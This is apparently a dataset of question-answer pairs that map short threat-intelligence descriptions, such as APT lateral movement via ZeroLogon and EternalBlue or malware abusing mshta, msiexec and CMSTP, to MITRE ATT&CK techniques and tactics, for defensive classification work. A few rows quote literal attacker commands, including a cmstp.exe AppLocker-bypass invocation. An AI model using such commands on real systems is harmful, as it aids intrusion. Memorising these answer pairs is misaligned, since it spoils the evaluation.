+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can identify a specific string in intercepted network traffic, `SSH-2.0-OpenSSH_0.3xx.`, to trigger its command functionality.","Tecnique: T1205 Traffic Signaling, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports.,"Tecnique: T1205.001 Traffic Signaling: Port Knocking, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can use port-knocking to authenticate itself to another implant called Cryshell to establish an indirect connection to the C2 server.,"Tecnique: T1205.001 Traffic Signaling: Port Knocking, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has authenticated itself to a different implant, Cryshell, through a port knocking and handshake procedure.","Tecnique: T1205.001 Traffic Signaling: Port Knocking, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PITSTOP can listen and evaluate incoming commands on the domain socket, created by PITHOOK malware, located at `/data/runtime/cockpit/wd.fd` for a predefined magic byte sequence. PITSTOP can then duplicate the socket for further communication over TLS.","Tecnique: T1205.002 Traffic Signaling: Socket Filters, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.,"Tecnique: T1205.002 Traffic Signaling: Socket Filters, Tactic: TA0011 Command and Control TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mimikatz’s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC.,"Tecnique: T1207 Rogue Domain Controller, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used Mimikatz to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has exploited ZeroLogon (CVE-2020-1472) against vulnerable domain controllers.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has exploited known vulnerabilities in remote services including RDP.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has exploited MS17-010 to move laterally to other systems on the network.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used EternalBlue exploits for lateral movement.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has exploited or attempted to exploit Zerologon (CVE-2020-1472) and EternalBlue (MS17-010) vulnerabilities.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used tools to exploit the ZeroLogon vulnerability (CVE-2020-1472).,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit used the EternalRomance SMB exploit to spread through victim networks.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been seen exploiting SMB via a vulnerability exploit like EternalBlue (MS17-010) to achieve lateral movement and propagation.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.","Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network.","Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains a module for exploiting SMB via EternalBlue.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can move laterally using worm-like functionality through exploitation of SMB.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.","Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry uses an exploit in SMBv1 to spread itself to other remote systems on a network.,"Tecnique: T1210 Exploitation of Remote Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used CVE-2015-4902 to bypass security features.,"Tecnique: T1211 Exploitation for Defense Evasion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 accessed victims' internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations.","Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has collected files from various information repositories.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has collected schemas and user accounts from systems running SQL Server.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team exfiltrates data of interest from enterprise databases using Adminer.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used a custom .NET tool to collect documents from an organization's internal central database.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell has the ability to list and extract data from SQL databases.,"Tecnique: T1213 Data from Information Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.,"Tecnique: T1213.001 Data from Information Repositories: Confluence, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider accessed victim SharePoint environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides.","Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has collected information from Microsoft SharePoint services within target networks.,"Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira has accessed and downloaded information stored in SharePoint instances as part of data gathering and exfiltration activity.,"Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has collected documents from the victim's SharePoint.,"Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember.,"Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.,"Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: spwebmember is used to enumerate and dump information from Microsoft SharePoint.,"Tecnique: T1213.002 Data from Information Repositories: Sharepoint, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 downloaded source code from code repositories.","Tecnique: T1213.003 Data from Information Repositories: Code Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 cloned victim user Git repositories during intrusions.,"Tecnique: T1213.003 Data from Information Repositories: Code Repositories, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has searched a victim's network for code repositories like GitLab and GitHub to discover further high-privilege account credentials.,"Tecnique: T1213.003 Data from Information Repositories: Code Repositories, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider enumerates data stored within victim code repositories, such as internal GitHub repositories.","Tecnique: T1213.003 Data from Information Repositories: Code Repositories, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.","Tecnique: T1216.001 System Script Proxy Execution: PubPrn, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.","Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used type \\\c$\Users\\Favorites\Links\Bookmarks bar\Imported From IE\*citrix* for bookmark discovery.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider retrieves browser histories via infostealer malware such as Raccoon Stealer.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto collects information on bookmarks from Google Chrome.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can retrieve browser history.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can retrieve browser history.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has the ability to gather browser data such as bookmarks and visited sites.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can retrieve browser history and database files.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers.","Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can collect the contents of the `%USERPROFILE%\AppData\Local\Google\Chrome\User Data\LocalState` file.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MobileOrder has a command to upload to its C2 server victim browser bookmarks.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess has a browser info stealer module that can read Chrome and Edge browser database files.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP has collected browser bookmark and history information.,"Tecnique: T1217 Browser Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group lnk files used for persistence have abused the Windows Update Client (wuauclt.exe) to execute a malicious DLL.,"Tecnique: T1218 System Binary Proxy Execution, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used CHM files to move concealed payloads.,"Tecnique: T1218.001 System Binary Proxy Execution: Compiled HTML File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used compiled HTML (.chm) files for targeting.,"Tecnique: T1218.001 System Binary Proxy Execution: Compiled HTML File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal leveraged a compiled HTML file that contained a command to download and run an executable.,"Tecnique: T1218.001 System Binary Proxy Execution: Compiled HTML File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim.,"Tecnique: T1218.001 System Binary Proxy Execution: Compiled HTML File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has weaponized CHM files in their phishing campaigns.,"Tecnique: T1218.001 System Binary Proxy Execution: Compiled HTML File, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses ActiveX objects for file execution and manipulation.,"Tecnique: T1218.001 System Binary Proxy Execution: Compiled HTML File, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used control panel files (CPL), delivered via e-mail, for execution.","Tecnique: T1218.002 System Binary Proxy Execution: Control Panel, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can register itself for execution and persistence via the Control Panel.,"Tecnique: T1218.002 System Binary Proxy Execution: Control Panel, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver drops and executes a malicious CPL file as its payload.,"Tecnique: T1218.002 System Binary Proxy Execution: Control Panel, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used the command cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.,"Tecnique: T1218.003 System Binary Proxy Execution: CMSTP, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.,"Tecnique: T1218.003 System Binary Proxy Execution: CMSTP, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used InstallUtil.exe to execute a malicious Beacon stager.,"Tecnique: T1218.004 System Binary Proxy Execution: InstallUtil, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used InstallUtil.exe to execute malicious software.,"Tecnique: T1218.004 System Binary Proxy Execution: InstallUtil, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used Installutill to download content.,"Tecnique: T1218.004 System Binary Proxy Execution: InstallUtil, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot had used `InstallUtil.exe` to download and deploy executables.,"Tecnique: T1218.004 System Binary Proxy Execution: InstallUtil, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate has used `InstallUtil.exe` as part of its process to disable Windows Defender.,"Tecnique: T1218.004 System Binary Proxy Execution: InstallUtil, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used `mshta` to execute DLLs.","Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`.","Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has use `mshta` to execute malicious scripts on a compromised host.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used mshta.exe for code execution.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used mshta.exe to execute malicious VBScript.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used `mshta.exe` to execute malicious HTA files.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used malicious HTA files to drop and execute malware.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used mshta.exe to run malicious scripts on the system.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used `mshta.exe` to execute Koadic stagers.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used mshta.exe to launch collection scripts.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has utilized `mshta.exe` to execute a malicious hta file.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used mshta.exe to execute malicious payloads.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used `mshta` to execute scripts including VBS.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used mshta.exe to execute malicious payloads.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has used mshta.exe to download and execute applications from a remote server.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used mshta.exe to execute a HTA payload.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu uses mshta.exe to load its program and files.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT uses mshta.exe to run malicious scripts on the system.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has been executed via MSHTA application.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can use mshta for executing scripts.,"Tecnique: T1218.005 System Binary Proxy Execution: Mshta, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has used msiexec to install the Machete malware.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has used msiexec.exe to execute an MSI payload.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has used msiexec to download and execute malicious installer files over HTTP.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used msiexec to download and execute malicious Windows Installer files.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used the msiexec.exe command-line utility to download and execute malicious MSI files.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has been installed via MSI installer.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used .MSI files as an initial way to start the infection chain.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can use msiexec.exe to disable security tools on the system.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can use `msiexec.exe` for execution of malicious DLL.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu has used msiexec to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.","Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has been installed via `msiexec.exe`.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can use MSI files to execute DLLs.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali has used the MSI installer to download and execute malicious payloads.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner used an MSI installer to install the virtualization software.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using msiexec.","Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz can use MSI files with embedded VBScript for execution.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used MsiExec.exe to automatically execute files.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has been installed via MSI installer.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use MSIExec to spawn multiple cmd.exe processes.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession has the ability to execute inside the msiexec.exe process.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
